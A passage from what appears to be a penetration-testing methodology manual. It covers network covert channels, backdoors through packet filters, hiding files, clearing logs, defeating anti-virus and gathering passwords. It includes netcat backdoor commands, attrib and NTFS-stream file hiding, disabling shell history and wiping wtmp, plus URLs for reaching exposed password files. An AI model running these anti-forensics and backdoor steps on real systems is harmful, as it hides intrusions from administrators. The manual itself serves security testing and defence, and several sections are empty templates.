The 16 bit IP ID (Identification) field is the most eligible choice, which can be used for
byte-to-byte covert communication. The IP ID field gives a unique identification number
to each packet, which is used to identify the fragmented packets during reassembly
among other tasks. Other fields like the Flags can also be used however they have a
possibility of being altered or stripped off by various network transit points due to
fragmentation or filtering.
Transport Control Protocol (TCP)
The Transport Control Protocol (or TCP) is a connection-oriented protocol which handles
end-to-end reliability in network communications. Due to enhanced error-correction and
reliability, it has a lot of control overhead which can be successfully exploited for covert
communication (See below, the TCP header).
Again we will choose only the practical and less varying fields for covert data
piggybacking.
Page 240 of 1123
The ISN Method
The 4 byte Sequence Number field seems as a good choice. The Initial Sequence
Number (or ISN) is used for establishment for a steadfast end-to-end virtual circuit by
using the method of three-way handshake. This standard method involves a
Synchronize packet being sent from the client to the server which has an ISN describing
the connection and the SYN Flag turned on. The server acknowledges with a reply
packet having its own ISN and Acknowledgement number (client’s ISN+1), with SYN and
ACK fields turned on. The client further acknowledges to this packet henceforth
completing the three-way handshake.
The large 32 bit address space of the Sequence Number field can be used for covert
data storage. The sending party will send the payload over the Sequence Number field
and the passively listening receiving party will then extract the data. Hence by using the
Sequence Number field in a Synchronize (SYN) packet we can establish an independent
two way communication channel.
ACK Bounce Method
Another method which involves the TCP header can be used. Termed as the ACK
Bounce Method, it provides relatively high anonymity over the cost of no backward
communication.
Page 241 of 1123
In this method, the value of the payload (32 bit) is decremented by one and is written to
the Sequence Number field of the TCP header. The sending party then transmits the
payload packet (SYN). The important characteristics which differentiate it from the
previously discussed method are:
The destination IP addresses of the payload packet is set to the IP address of the
Bounce (Intermediate) Server.
The source IP address of the packet is set to the IP address of the receiving party.
Here the Bounce Server can be any server which can act as an intermediary between
sender and receiver. Now when the Bounce Server receives this payload packet from
the sending party, following the prescribed procedure of the three-way handshake, it
replies with an acknowledgement (ACK). However the acknowledgement packet is sent
to the receiving party (as the source IP address of the payload packet was spoofed to be
that of the receiving party) which is in a passive listen mode. The receiver host receives
Page 242 of 1123
the packet and decrements the acknowledgement number by one and retrieves the
covert data.
This method fools the Bounce Server into sending the packet and encapsulated data
back to the forged source IP address (receiver). From the receiving end, the packet
appears to originate from the Bounce Server. If the receiving system is behind a firewall
that allows communication to some trusted sites only, this method can be used to
bounce packets off of the trusted sites which will then relay them to the system behind
the firewall with a legitimate source address (receiver).
The two important things to note here are that Bounce Server TCP port, where the
payload packet was destined must be in listen mode and the receiver must be in passive
listen mode for all packets comings from the Bounce Server to a specific port.
These concepts were first introduced by Craig H. Rowland in his excellent article “Covert
Channels in the TCP/IP Protocol Suite” and also presented a Linux based application
called covert_tcp which demonstrated the concept. An enhanced version of the same
tool called NCovert has been developed by Nomad Mobile Research Group
(www.nmrc.org).
The ACK Tunneling Method
Most common firewalls available today block all incoming connections from untrusted
hosts, however they allow all outgoing connections. This is what the ACK Tunneling
Method exploits. The sender (outside the firewall) sends concealed data in an ACK
segment, which is destined for a listening receiver (inside the firewall). For the firewall it
may seem as if the payload packet is a reply to some SYN packet, sent during the three
way handshake and hence allows the packet to pass-through. The only thing the
sending party must be aware of is the IP address of the receiver. This method works for
only basic firewalls, because the new-breed of stateful firewalls know all connection
details and will discard the payload packet immediately.
Page 243 of 1123
A proof-of-concept implementation was developed by Arne Vidstrom for Windows called
AckCmd. AckCmd is a Trojan based on the ACK Tunneling method which spawns a
command prompt on connection establishment.
Internet Control Message Protocol (ICMP)
Internet Control Message Protocol (or ICMP) was designed to pass error notification and
messages between network hosts and servers. ICMP packets are encapsulated inside
IP datagrams. A network node can send an error notification or query some other node
about some specific information, which the receiving node replies back in a specific
format. ICMP is implemented by all TCP/IP hosts.
The above diagram shows the ICMP header, Type field identifies the type of packet
associated code is notified by the Code field. We are interested in the ICMP Echo
Request & Echo Reply. ICMP Echo Request is used to check whether a remote host is
Page 244 of 1123
alive or not. When an echo request is sent to a host, the host replies back with an echo
reply packet. The highly popular Ping command uses echo requests and replies. The
optional data field allows having a variable length data to be returned to the sender. IP
options like router alert, record route and time stamp can be used encapsulating ICMP
echo request message. This provides a possibility to have covert channel. Nowadays
most firewall filter out incoming echo requests, but they do allow echo replies, which
provides a scope for a covert channel bypassing the firewall. Other possible ICMP
packet types which have a possibility of exploitation are ICMP Address Mask and Router
Solicitation.
Many tools implementing the ICMP protocol as a covert channel have been developed. It
seems to be the most popular choice because of universal support, large data carrying
capacity and it raises fewer suspicions as the protocol itself is considered to be benign.
Article 6 of the highly recognized underground magazine Phrack discusses the
possibility of a covert channel in ICMP (named Project Loki) in a very detailed manner. A
proof-of-concept library called Loki, which implemented ICMP echo request or reply
based covert channels and provided authentication support (simple XOR or Blowfish),
was developed which can be used to implement covertness in any application.
Other popular implementations which are widely used are ICMPTunnel, Ish, ITunnel and
007Shell which emulate a remote shell.
Hyper Text Transfer Protocol (HTTP)
The HTTP protocol is the blood of World Wide Web. It is perhaps the most widely
deployed protocol over the Internet, and is allowed to pass through almost all networks.
RFC 2616 defines it as
"HTTP protocol is an application-level protocol ... It is a generic, stateless, protocol which
can be used for many tasks beyond its use for hypertext ...."
Almost all organizations allow the use of HTTP protocol as WWW is the primary
information resource. However it has a lot of design flaws which can be exploited, and
hence is becoming one of the best and most popular ways to conceal covert data flows.
Because of the limitations of lower layer protocols (TCP, IP, ICMP) like limited data
carrying capacity, bandwidth limitations, possible alteration of the protocol credentials (IP
Page 245 of 1123
ID, TCP ISN etc) at intermediate network nodes, HTTP has become the de-facto way to
go covert.
The most commendable research on HTTP as a viable covert channel is done by
researchers at www.Gray-World.net. The website is undoubtedly one the best place to
gather the cutting edge information about covert channels (or what they term as network
access control systems bypassing).
HTTP is request-response based, the client sends a query request and the server
acknowledges by sending the requested data. The architecture of covert channels over
HTTP is also client-server based. The covert server can listen to requests coming at port
80, like normal HTTP servers. The covert client connects to the server and the covert
communication is processed in a similar fashion as HTTP request-response. Or a proxy
like covert server can be implemented which redirects the request to another server, get
the response and sends it back. Another method is CGI-based backdoor in which can
arbitrary data can be passed via URL strings of query requests. Many add-on techniques
like using multiple proxies, reverse connections, authentication, encryption, multiple
HTTP headers for communication, reverse proxies, proprietary user defined modes can
further complicate the matters and can make the channel almost impossible to detect.
There is an attractive stockpile of tools on HTTP based covert channeling. Covert
Channel and Testing Tool (CCTT, by www.gray-world.net) tunnels any generic
communication like the SSH into higher layer protocol like HTTP. It has a lot of
configuration options like elaborate support of proxies, multiple clients and reverse
proxies which make it a very effective tool. Another tool called HTTPTunnel (by Lars
Brinkhoff) provides bi-directional virtual data paths tunneled in HTTP. HTun is another, a
Page 246 of 1123
one of its kind tool, which provides a complete point-to-point virtual IP network over valid
HTTP requests.
Tools like ProxyTunnel, Transconnect, Corkscrew and FirePass provide tunneling of
various communication channels (like SSH, Telnet) by implementing various HTTP
based covert channeling techniques. The list of tools which provide covert channels and
tunneling of data streams over HTTP is almost endless, the user has a lot of options to
choose a practically viable application.
IPv6
IPv6 is the new avatar of IP. It is a proposed enhancement over IP, meant to replace it
completely in the coming years. It provides enhanced reliability, broader address space
and more security than IP. As you might have guessed IPv6 can also be used a vector of
covert communication. The Extension Header in the IPv6 protocol, has 16 bits for Next
Header type, 8 bits for header length, variable length options field (must be TLV
encoded).
The first two high order bits of the options filed specify what action must be taken if the
option type is not recognized.
00 - Skip this option and continue processing the header.
01 - Discard the packet.
Page 247 of 1123
A possible covert channel can be implemented if we generate a destination options
extension header. Set the high order 2 bits of the option type to 00 and choose an option
type value not recognized yet. Then encode the packet in the TLV format.
A proof-of-concept chat application called J6P (Joe 6 Pack) was developed by Thomas
Graf using this technique. The technique is widely used to transfer IRC traffic stealthily.
Domain Name Service (DNS) Protocol
Unluckily the Domain Name Service (or DNS) Protocol, which is the backbone of Internet
naming system, has been hit by the covert contortionists. The DNS recursion technique
is where the stealth data can be planted. NSTx and DNShell use these methods to
provide an effective covert channel over DNS. The data is sent through a series of clientserver communication by encoding data in DNS TXT, DNS A and DNS NXT packets.
Covert Miscellany
Now we will describe some out of the league concealed communication techniques and
some attention-grabbing experimentation and research in the same.
Applications:
Active Port Forwarder is an interesting application which bypasses firewalls by using an
intermediate port forwarding node, with added compression and SSL support.
BackStealth is another application which is executed in the memory space of the firewall
itself.
MSNShell is a covert communication application which provides data hiding in the MSN
Messenger Protocol.
TunnelShell provides stealthy command shell by using malformed packets like
fragmented IP packets without headers for the fourth layer, which many firewalls allow to
pass through.
Cd00r.c and SADoor provide passive listening backdoors which do not bind to any
specific port. These are activated by sending a specialized sequence of packets.
RECUB is another user-friendly covert mode application which provides a graphical
interface, encryption and ICMP based authentication.
Page 248 of 1123
Techniques:
M.Marone (Yale University) provides a fascinating analysis on the possibility of using the
ad-hoc mobile network protocols like Dynamic Source Routing as a media of clandestine
communication in his paper titled “Adaptation and Performance of Covert Channels in
Dynamic Source Routing”
Christopher Abad (UCLA) stresses on the fact that an elementary flaw in the Internet
checksum technique can allow data camouflage in the checksum itself, using hash
collisions.
Spamdoor is the term describing the feasibility of using spam as a vector of backdoor
communication.
Kamran Ehsan (University of Toronto) has written a absolutely must read post-graduate
thesis titled “Covert Channel Analysis and Data Hiding in TCP/IP” which discusses many
potent channeling techniques over TCP/IP, ICMP, IGMP, IPSec.
B.8.5 Test the covertness of channel using common detection
technique
Before moving on further I would like to add that detection of network based covert
channels is still in its infancy. All the research done till yet mostly discusses the
theoretical possibilities, dealing with statistical analyses, probabilistic theories and
complex mathematics, with few rare implementations and practicals. However, this does
not mean that detection is not practically feasible. It’s just that the berry will take some
time to ripen.
After ripping apart covert channels, the research community seems a little bored, now as
if detection of these channels has become the hot topic among these communication
cohorts. The extent of documentation on emerging on the issue is spectacular. All highprofiled conferences (like the Information Hiding Workshops, Communications of the
ACM) feature quite a few papers on them. We will have a walk over on few interesting,
practically viable techniques.
Page 249 of 1123
B.8.5.1 STREAM PROFILING
Stream Profiling is a grassroots technique which profiles or records the data flow of
various protocols, slowly and steadily developing a signature for regular traffic. It then
analyses data flow comparing the standard signatures with the current, informing the
administrator of any possible anomalies. It can be considered as a hybrid of Anomaly
Detection Systems (ADS) and Intrusion Detection Systems (IDS). Many commercial
applications are available based on this technique.
B.8.5.2 ACTIVE WARDENS
Active Wardens are akin to a firewall, a network application checking all the traffic and
applying security policies on them. However, unlike firewalls, Wardens remove, modify
or detect any likely carriers (on all network layers) of covert channels. These wardens
alter and distort data passing through them to such an extent that it does not affect the
reception quality at the user level, but eliminates all potential sources of covert
communication. This almost imperceptible modification is called Minimal Requisite
Fidelity. Successful implementation of this technique over live communications is still on
the drawing boards, however the technique is a likely contender.
B.8.5.3 QUANTIZED PUMPS
Quantized Pumps limit covert channels in one-way communication systems. It is an
advancement of traditional one-way communication systems like Store-And-Forward
Protocol, The Pump and Upwards Channel. Each of these legacy techniques have
theoretical and practical limitations like downgraded performance in large covert
channels, hard to analyze and restrictions to precise data rates. However with Quantized
Pumps the bandwidth of covert channels can be controlled precisely.
Page 250 of 1123
B.8.6 Countermeasures
B.8.7 Backdoors - Packet Filters
Daemon Shell-UDP. Bind to an allowed source port (e.g. 20)
Steps to be performed:
Step 1:
On Assessor Machine type following:
#nc –p 25 <target system IP address> 5000
Step 2:
On Target system type followings:
#nc –l –v –n –p 5000
B.8.8 Backdoors - Stateful Filters
•
Reverse telnets
•
Tunnel from Phrack 52
•
ssh with the –R options
•
ssh with the –L options
B.8.9 Backdoors - Application Level Firewalls
Reverse www shell
•
It allows an assessor to access a machine on your internal network from the
outside
•
It simply looks like an internal user is browsing the web.
•
Its entire traffic is base 64 encoded
Page 251 of 1123
•
It runs on specific time (slave) in a day
•
The assessor needs to install a simple Trojan program on a machine in your
network, the Reverse WWW shell server.
•
The Reverse WWW shell server spawns a back channel to the master
•
As assessor types into the master system, the command is retrieved and
executed on the target system.
B.8.10
•
Backdoors - Countermeasures
Allow traffic based on services access policy. A services access policy clearly
defines what traffic is allowed inside network and what traffic is allowed to go out
from network and rest everything is denied. Authenticate outbound traffic as per your
policy.
•
Use application proxies, its difficult to establish back channels when they are in use.
But off-course it’s not impossible.
B.8.11
Root-kits
B.8.11.1
ROOT-KITS - APPLICATION LEVEL
•
Lrk5
•
T0rnkit
B.8.11.2
ROOT-KITS - KERNEL-LEVEL
•
Knark
•
Adore
•
Solaris LKM
Page 252 of 1123
B.9 COVERING THE TRACKS
B.9.1 Hide Files
Description
Hiding files is important for the security assessor/auditor to hide activities which he has
done so far while and after compromising the system and to maintain back channel[s].
Objective
Hide tools/exploit used during compromise
Hide tools/exploit used after compromise
Hide key logger output
Hide activities performed from compromised machine against other hosts
Process
UNIX Systems
•
Rename the files like “ . “, “ .. “, “ …”, “ .confusing-name ” etc.
•
Put the file in multiple/recursive hidden directories.
•
Hide the files using root-kits
Windows Systems
•
Hiding the files/directories with attrib +h
•
Putting files into un-accessible directories
•
Hiding files with file streaming on NTFS
Page 253 of 1123
B.9.1.1 HIDE FILES (UNIX)
B.9.1.1.1 RENAME THE FILES LIKE “ . “, “ .. “, “ …”, “ .CONFUSING-NAME ” ETC.
Description
A file name starting with a “ . “, “ .. “ … “ will not appear in simple listing. If given appropriate
confusing name with dot like .ssh2, it may be ignored by many system administrators. This
is very basic technique.
Examples/Results
# ls
Desktop
Documents Library
Movies
Music
Pictures Public
Sites
books
# ls –al
total 40
drwxr-xr-x 20 balwant staff 680 Dec 26 02:44 .
drwxrwxr-t 5 root
wheel 170 Nov 11 05:25 ..
-rw-r--r-- 1 balwant staff
-rw-r--r-- 1 balwant staff
4 Dec 26 02:26 ...
3 Nov 11 05:25 .CFUserTextEncoding
drwxr-xr-x 3 balwant staff 102 Jan 12 1970 .dvdcss
drwx------ 3 balwant staff 102 Feb 3 1970 .ssh
drwx------ 11 balwant staff 374 Dec 25 16:49 Desktop
drwx------ 7 balwant staff 238 Dec 21 15:17 Documents
drwx------ 26 balwant staff 884 Dec 25 16:05 Library
drwx------ 3 balwant staff 102 Nov 11 05:25 Movies
drwx------ 4 balwant staff 136 Dec 25 16:05 Music
drwx------ 4 balwant staff 136 Jan 10 1970 Pictures
drwxr-xr-x 4 balwant staff 136 Nov 11 05:25 Public
drwxr-xr-x 6 balwant staff 204 Jan 1 1970 Sites
drwxr-xr-x 2 balwant staff
68 Dec 25 12:48 books
Analysis/Conclusion/Observation
Countermeasures
Remarks
Page 254 of 1123
Put the file in multiple/recursive hidden directories
Putting the in multiple/recursive hidden directories makes it more difficult to detect. Put
them to multiple down directories and give them name as discussed in previous step.
Page 255 of 1123
B.9.1.1.2 HIDING THE FILES USING ROOT-KITS
Description
Root-kits come equipped with the functionality to hide file generically. See root-kits section
for details on using them to hide files.
Examples/Results
[localhost]%ava h file-to-hide
Analysis/Conclusion/Observation
Countermeasures
Remarks
Page 256 of 1123
B.9.1.2 HIDE FILES (WINDOWS)
Description
Hiding files in Windows system is little easier then unix system and most of the method
are as easy to discovery as they are to hide. It is recommended that a security
assessor/auditor should have adequate knowledge of DoS.
B.9.1.2.1 HIDE THE FILES/DIRECTORIES WITH ATTRIB +S +H
Description
The attrib command changes the attributes of the mentioned file/directory.
Examples/Results
C:>attrib +s +h file-name
C:>attrib +s +h dir-name
Analysis/Conclusion/Observation
•
The “+s” option is to enable the system flag
•
The “+h” option is to enable the hidden flag.
•
Most system administrator re-configure their explorer settings so that they see
hidden files but most of them don’t want to see system files (to avoid messing with
them)
Countermeasures
Remarks
Page 257 of 1123
B.9.1.2.2 HIDE THE FILES WITH FILE STREAMING ON NTFS
Description
On NTFS, any file can be added into another file’s stream. As per Microsoft a file stream is,
“A mechanism to add additional attributes or information to a file without restructuring the
file system” This functionality can be abused if attacker stream malicious file into some non
suspicious file.
Pre-requisite
To accomplish this attacker needs a simple tool “cp” from NT resource kit.
Examples/Results
Following command streams exploit.exe into notepad.exe.
C:>cp explot.exe notepad.exe:exploit.exe
Attacker can later un-stream it by using the following command
C:>cp notepad.exe:exploit.exe exploit.exe
Analysis/Conclusion/Observation
The “+h” option is to enable the hidden flag.
Countermeasures
Remarks
This functionality is only available on NTFS. If you copy a streamed file to another file
system, you’ll loose your stream.
Page 258 of 1123
B.9.1.2.3 PUTTING FILES INTO UN-ACCESSIBLE DIRECTORIES
Description
In windows system if the filename/directory is a combination of a special characters it can’t
be opened without prior knowledge of combination used by attacker to rename the
file/directory.
Pre-requisite
Examples/Results
C:> REN < file / directory name > alt+255
C:> attrib +h <file / directory name >
Analysis/Conclusion/Observation
The combination appears on the screen as a line “___”. Even if an attempt is made to
delete the said files, windows system gives error “The file does not exist or is moved to
some other location”. To further disguise the file make it hidden with attrib +h command
This is a good way to hide files conveniently and securely. Even for admin it’s difficult to
delete, read and/or rename since he don’t know the combination used to rename file. Only
way to remove these files is format the drive.
Countermeasures
Perform dictionary or brute force attack to find out the file name.
Remarks
Write down the tool name if you come across that does it.
Page 259 of 1123
B.9.1.2.4 PUTTING FILES INTO “SPECIAL WINDOWS” DIRECTORIES
Description
Possible to create “custom” system folders under C:\>winnt\system32
Use the “Special Name”
•
Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
•
Internet Explorer.{FBF23B42-E3F0-101B-8488-00AA003E56F8}
•
Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}
•
My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
•
My Documents.{ECF03A32-103D-11d2-854D-006008059367}
•
Fonts.{BD84B380-8CA2-1069-AB1D-08000948F534}
Through Explorer, the “correct” system folder is opened but through a DOS-prompt & FTP,
these folders are seen as “regular” folders. This allows the storing & uploading of files.
Pre-requisite
These
directories
have
to
be
created
under
the
C:\>winnt\system32
or
C:\>windows\system32 directories to be effective.
Examples/Results
C:\WINDOWS\system32>dir contr*
Volume in drive C is System
Volume Serial Number is 60F7-93FC
Directory of C:\WINDOWS\system32
10/08/2004
22:34
<DIR>
Control Panel.{21EC2020-3AEA-1069-A2DD-
08002B30309D}
31/03/2003 14:00
1 File(s)
8.192 control.exe
8.192 bytes
1 Dir(s) 1.224.241.152 bytes free
C:\WINDOWS\system32\Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}>dir
Volume in drive C is System
Volume Serial Number is 60F7-93FC
Page 260 of 1123
Directory
of
C:\WINDOWS\system32\Control
Panel.{21EC2020-3AEA-1069-A2DD-
08002B30309D}
10/08/2004 22:34
<DIR>
.
10/08/2004 22:34
<DIR>
..
0 File(s)
0 bytes
2 Dir(s) 1.223.438.336 bytes free
Analysis/Conclusion/Observation
Countermeasures
Remarks
Page 261 of 1123
B.9.2 Clear Logs
Description
The importance of this stage is easily understood but usually understated. After attacker
has successfully compromised a system, he will like to keep it without alerting the
administrator, for obvious reasons. Longer the attacker stays on a compromised system
better the chances that he will be able to achieve his goals further in the network.
During the process of compromising the system, some suspicious and/or erroneous
activities are logged. A skilled attacker knows that logs need to be doctored. He modifies
them to cover his tracks and delude his presence.
Methodology
•
Check History
•
Edit Log files
B.9.2.1 CLEAR LOGS (WINDOWS)
Process
Event Viewer Logs
Web Server Log
Terminal Service Log
Tools
•
Elsave
Links
•
HTTP://WWW.IBT.KU.DK/JESPER/ELSAVE/
Page 262 of 1123
B.9.2.2 CLEAR LOGS (UNIX)
B.9.2.2.1 CHECK HISTORY
Description
History file in UNIX system contains recent commands. A skilled attacker preferably
disables the history feature, but in case he needs the history feature for ease of use, he
can delete it after his job is over.
Disabling the history feature of shell
#unset HISTFILE && unset SAVEHIST
Linking the history file to /dev/null
#ln –s /dev/null ~/.bash_history
Pre-requisite
Examples/Results
Disabling the history feature of shell
#unset HISTFILE && unset SAVEHIST
Linking the history file to /dev/null
#ln –s /dev/null ~/.bash_history
Analysis/Conclusion/Observation
Countermeasures
Remarks
Page 263 of 1123
B.9.2.2.2 EDIT LOG FILES
Description
Complete removal of log is an indication of some incident. A skilled attacker will always
remove the relevant log entries.
Step One: Locate the logs
Syslog.conf contains storage path for the log files. The interesting entries in syslog.conf
are, “authpriv”, wtmp, xferlog, maillog and spooler related entries.
#cat /etc/syslog.conf
The default location for these files is /var/log/ directory. If the admin has changed the
location of these files, the attacker will know the new location by /etc/syslog.conf file.
Check into following log files from their default location
/var/log/messages
/var/log/secure
/var/log/httpd/error_log ( log of particular file exploited)
/var/log/httpd/access_log ( log of exploit run on webserver)
If above mentioned files are not available on their default locations, check them into
syslog.conf
Step Two: Clear wtmp file
This file is in binary format, assessor/auditor uses root-kit program for clearing it. This file is
generally used in conjunction with who command. Wzap is one such tool. It clears the user
(from the wtmp log) specified by the attacker.
#/opt/wzap
Enter username to zap from wtmp: owned
Opening file…
Opening output file…
Page 264 of 1123
Working…
The output file (wtmp.out) will be free from entries for user owned. Simply copy
wtmp.out
to wtmp.
#cp wtmp.out /var/log/wtmp
The entries for user owned are erased from wtmp. To make sure issue following command:
#who ./wtmp
Step Three: Manually editing the logs
Rest of the logs files (messages, secure, xferlog etc) shall be edited by using any editor.
(vi, emac, nano, joe etc..)
Pre-requisite
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Store the log files on difficult to modify media. You can use a file system which
support an append only flag
•
Log the critical log information on a secure logging host.
•
Use log monitoring programs for monitoring and generating alerts.
•
Tool Swatch
Terminology
•
utmp: contains information about currently logged in users
•
wtmp: contains information about passed login sessions, system shoutdowns,
system crashes etc…
•
lastlog: contains information about last logged user, port and login time.
Above mentioned files are used with who command.
Remarks
Page 265 of 1123
Page 266 of 1123
B.9.3 Defeat Anti-virus
Some time anti-virus doesn’t allow you to implement a root-kit. First disable the anti-virus
and implement it.
B.9.4 Implement Root-kits
[Text]
B.9.5 Defeat integrity checking
[Text]
B.9.6 Account Entry Editing
[Text]
B.10 AUDIT
Perform security audit wherever penetration testing can not be performed or is not
appropriate.
Page 267 of 1123
B.11 REPORTING
The reporting should follow a well documented structure. Things that should be definitely
in the report are the following parts:
•
management summary
•
Scope of the project (and Out of Scope parts)
•
Tools that have been used (including exploits)
•
Dates & times of the actual tests on the systems
•
Every single output of tests performed (excluding vulnerability scan reports which
can be included as attachments)
•
A list of all identified vulnerabilities with included recommendations on how to
“cure” the vulnerabilities found.
•
A list of Action points (what recommendation to perform first, what is the
recommendation curing?)
Refer Appendix for template.
B.12 CLEAN UP AND DESTROY ARTIFACTS
Al information that is created and/or stored on the tested systems should be removed
from these systems. If this is for some reason not possible from remote distance, all
these files (with their location) should be mentioned in the technical report so that the
company technical staff will be able to remove these after the report has been received.
This list should very detail so that the system administrators can do their job without
having to rebuild the system…
Page 268 of 1123
C PASSWORD SECURITY
Description
This chapter covers the use of passwords during the security process, mainly used for
authentication and/or authorization purposes, but also for encryption, protection of
configuration options/screens, etc.
The first part contemplates different scenarios on obtaining the encrypted or hashed
version of the passwords for offline cracking. The second part contemplates the cracking
process itself.
The first part is rather vague, because the ways to gather authentication credentials can
vary from a system or application to another, so only general advice is provided. Please
refer to other chapters of ISSAF for details on vulnerability exploiting, privilege
escalation, SQL Injection, etc.
Security of the password processing using encryption techniques is discussed, together
with the pitfalls of not using encryption at all.
Different encryption algorithms are mentioned, and an overview of the cracking process
for the most common ones is presented as examples.
The importance of good password selection is highlighted, in line with the use of
appropriate password policies and reasonably secure encryption algorithms.
A briefing on the nature of "publicly known" versus "proprietary" encryption algorithms is
presented; their advantages and disadvantages.
The authentication credentials gathering process is shown from two different points of
view: that of a penetration tester, and that of a security auditor, in several different
scenarios.
Page 269 of 1123
C.1 FIRST PART: AUTHENTICATION CREDENTIALS GATHERING
C.2 OBJECTIVE
Describe the process of gathering authentication credentials during a penetration test or
a security audit, showing examples of the use of common tools against the most widely
deployed protection schemes.
Instruct the IT security professionals in the importance of good password selection,
together with the proper encryption algorithm.
C.3 EXPECTED RESULTS
Demonstrate how the selection of bad passwords, bad password policies, improperly
implemented/coded security, and/or inadequate encryption algorithms can jeopardize
the security of the infrastructure.
C.4 METHODOLOGY
The methodology to use will vary on different scenarios:
•
Low privilege, remote network
•
Low privilege, local network
•
Low privilege, local host
•
High privilege, remote network
•
High privilege, local network
•
High privilege, local host
The meaning of Low and High privileges is directly related to the type of analysis to
perform. Is the person performing the audit a penetration tester with low privileges, or a
security auditor with high (administrative) privileges?
In the case of having administrative privileges the process can be quite straightforward,
so the reading of the first 3 cases is highly recommended even for security auditors.
Page 270 of 1123
There are other factors that partially affect the methodology chosen, mainly related to the
application that’s using the password.
This flowchart depicts the attack tree for the potentially possible tests in search of
passwords or sensitive information that can be used to gain access to give a system.
Page 271 of 1123
Page 272 of 1123
C.5 STEP ONE: NETWORK AUTHENTICATION CREDENTIALS GATHERING AS
AN OUTSIDER PENETRATION TESTER (LOW PRIVILEGE)
C.5.1 Description
The penetration tester usually have only a connection to the Internet.
The risk of external intruders is the main concern, so the penetration tester has to
proceed as such an intruder, and in what regards to this module, trying to gather
information about the passwords and how to get them from the outside.
The main barrier to face are firewalls, that restrict the services available to attack, and IP
address based ACLs, that restrict who can try to authenticate using passwords to a
given service.
The next flow diagram depicts the situation faced by the penetration test.Objective
Describe the process of obtaining different types of commonly used authentication
credentials, from the perspective of a penetration tester.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.5.2 Expected Results
If passwords can be obtained by an outsider, something is badly configured.
Passwords not appropriately chosen will be cracked in a short time.
Good passwords will take some time to be cracked if the encryption algorithm used is
not very solid for today’s standards.
Good passwords can’t be cracked at all (except by luck!) if the encryption algorithm used
has no pitfalls that jeopardize its security.
C.5.3 Process (Steps to complete this task)
The general overview of the process to obtain passwords implies the following steps:
Page 273 of 1123
1. determine the different uses of passwords in the remote system for authentication
and /or authorization purposes
2. determine if encryption is in use
3. determine encryption algorithm used
4. obtaining the plaintext password, encrypted password or hashes (depending on
points 2 and 3 above, if no encryption is used the process ends here)
5. choose of the proper password analysis tool (password cracker)
6. attack of the encrypted password or hash with the proper method, depending on
methods available on the tool and maximum time available for the cracking
As a penetration tester, usually the privileges are the lowest possible, i.e.: no access
allowed at all to resources, and this will affect mainly step 4 above, and in some cases
all steps from 2 to 4. This can have the effect that to determine 2 and 3, step 4 has to be
performed first, depending on the particular case.
C.5.4 Example uses of common testing tool(s)
The first thing to consider if you’re connecting from the Internet is that’s very unlikely that
there’s any kind of access to the stored unencrypted/encrypted passwords or their
hashes, so getting some kind of foothold at least as an unprivileged user in the internal
network is a must.
Other than the above, the first step is to do an assessment of the remote system to
determine any use of passwords in it (authentication/authorization). Typically, this
implies doing a port scan of the remote system, and ulterior connection to all open ports
to assess if there are any password-aware applications used there.
Examples are: restricted areas of a webserver, webmail, administrative/configuration
applications in servers and devices, SMB/CIFS authentication via NetBIOS ports,
Terminal Services, etc.
SMB/CIFS logins and Terminal Services (that use the same authentication) must not be
exposed to the Internet. Block them at the border firewall. If, for example, Terminal
Services needs external connection, try to implement a VPN solution for that, or at least
ensure the use of extremely strong passwords for the remote accounts.
Page 274 of 1123
In addition to the general statement above we can found:
•
Passwords obtained abusing SQL Injection in a web application
•
Password hashes from the names.nsf database of a badly configured Lotus
Domino
•
.passwd files in a badly configured Apache server
•
Administrative password in badly configured CISCO routers
•
Passwords stored in the clear in comment fields in the information obtained by
abusing SNMP
•
Passwords stored in the clear in answer to finger requests
•
Passwords stored in the clear in comments in the source code of HTML pages
Most cases are covered by their own ISSAF chapter, so for SQL Injection here I will only
mention how to proceed once the passwords have been obtained, but this will be
dependant on the implementation. The passwords can be anything from unencrypted to
encrypted or hashed with any known or unknown algorithm. Here you’ve examples on
how the plaintext ‘password’ looks when encrypted/hashed with some very common
algorithms, perhaps this will help you to decide which password cracker to try.
Plaintext:
password
Algorithm
Ciphertext / Hash
MD2
F03881A88C6E39135F0ECC60EFD609B9
MD4
8A9D093F14F8701DF17732B2BB182C74
MD5
5F4DCC3B5AA765D61D8327DEB882CF99
SHA-1
5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
RIPEMD-160
2C08E8F5884750A7B99F6F2F342FC638DB25FF31
The second case can be as simple as:
http://domino_server/names.nsf
Page 275 of 1123
Either ‘as is’ or complemented with any of the Domino vulnerabilities you can found in
SecurityFocus (http://www.securityfocus.com/).
The third case is also quite straightforward if the Apache server isn’t configured to deny
the password files (denying them is the default configuration, if their name is .passwd),
and as long as you know which directory to look into (the _secret_ path below):
http://apache_server/_secret_/.passwd
The fourth and fifth cases can be found in a situation where the device is listening to
SNMP and responds to the read/write community name (that could be ‘public’, ‘private’,
etc.).
One of the best tools to interrogate SNMP aware devices is the IP Network Browser, one
of the components of the SolarWinds package (http://www.solarwinds.net/).
In the fourth case you’ve to download the OLD-CISCO-SYS-MIB file by tftp (either by
hand or using appropriate tools like SolarWinds’ IP Network Browser). In this file the
administrator password for the router is stored either as unencrypted, encrypted with the
old XOR cipher, or hashed with MD5. In the first 2 cases recovering it is easily feasible.
The sixth case depends on the existence of a finger server in the remote host. Then
issuing:
finger @hostname
will show all logged-in users, or if there's no one logged-in.
The seventh case implies reviewing the source code of HTML pages, in search of
designer comments, passwords to connect to databases, etc.
There could be other cases in which passwords can be obtained remotely, not including
the use of Trojan horses, but trying to enumerate ALL particular cases can take forever.
Page 276 of 1123
If there is a login page of any kind, odds are that a bruteforce attack can be launched
against it. This process is time consuming, generates a ton of logs if the security
administrator cares about them, and has a very low success ratio, only very simple
passwords (like 'password' or the userID as the password) will be found.
If there’s no possibility to grab passwords/hashes remotely, the only option is to found a
vulnerability that can be exploited to get access to an internal system. This process will
put us in the situation described in Step Two.
C.5.5 Result Analysis / Conclusion / Observation
If non required services like finger are disabled and/or firewalled, SNMP default
community names changed, Lotus Domino and/or Apache properly configured and
patched, HTML source code reviewed to remove any important information, and any
SQL aware web applications properly configured to sanitize user requests, it's almost
impossible to grab hold of passwords as a remote user with low privileges.
If any password authentication is exposed to the Internet, it is critical to audit the
passwords used to detect and force the change of the weak ones.
If passwords can be obtained, the strength of them will depend on the encryption
